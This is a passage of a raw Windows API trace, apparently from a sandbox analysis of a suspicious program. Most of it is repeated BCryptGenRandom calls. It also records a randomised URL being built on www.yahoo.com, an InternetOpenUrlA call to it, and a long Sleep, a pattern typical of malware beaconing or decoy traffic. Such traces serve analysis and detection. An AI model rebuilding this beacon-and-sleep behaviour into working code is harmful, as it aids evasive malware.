pbBuffer=0x46ffd5f) returned 0x0 [0266.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.063] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b270, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a1b270) returned 0x0 [0266.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0266.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.077] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.077] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.078] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.079] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.079] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.080] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.080] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.080] GetProcessHeap () returned 0x440000 [0266.080] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0266.081] lstrcpyA (in: lpString1=0x4726f0, lpString2="²\x98æQs://www.yahoo.com" | out: lpString1="²\x98æQs://www.yahoo.com") returned="²\x98æQs://www.yahoo.com" [0266.081] lstrcatA (in: lpString1="²\x98æQs://www.yahoo.com", lpString2="/gp6m7lKiJ6hsgdcw1kojpwV8Oo4ncp/0ovu2kF62Viuccyfb8byTivu5Ocb9i2Lf7wIDsk/" | out: lpString1="²\x98æQs://www.yahoo.com/gp6m7lKiJ6hsgdcw1kojpwV8Oo4ncp/0ovu2kF62Viuccyfb8byTivu5Ocb9i2Lf7wIDsk/") returned="²\x98æQs://www.yahoo.com/gp6m7lKiJ6hsgdcw1kojpwV8Oo4ncp/0ovu2kF62Viuccyfb8byTivu5Ocb9i2Lf7wIDsk/" [0266.081] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0266.081] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="²\x98æQs://www.yahoo.com/gp6m7lKiJ6hsgdcw1kojpwV8Oo4ncp/0ovu2kF62Viuccyfb8byTivu5Ocb9i2Lf7wIDsk/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0266.081] GetProcessHeap () returned 0x440000 [0266.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0266.081] GetProcessHeap () returned 0x440000 [0266.081] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0266.081] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0266.082] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0266.082] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0266.082] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0266.083] Sleep (dwMilliseconds=0x179c0) [0266.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0266.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.283] GetProcessHeap () returned 0x440000 [0266.283] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0266.283] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.283] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0266.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.284] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.284] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.285] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.285] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.286] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.286] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.287] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0266.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.288] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0266.289] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.289] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.290] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.290] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.291] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.291] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.291] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0266.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0266.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e48, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x4d5e48) returned 0x0 [0266.466] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0266.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 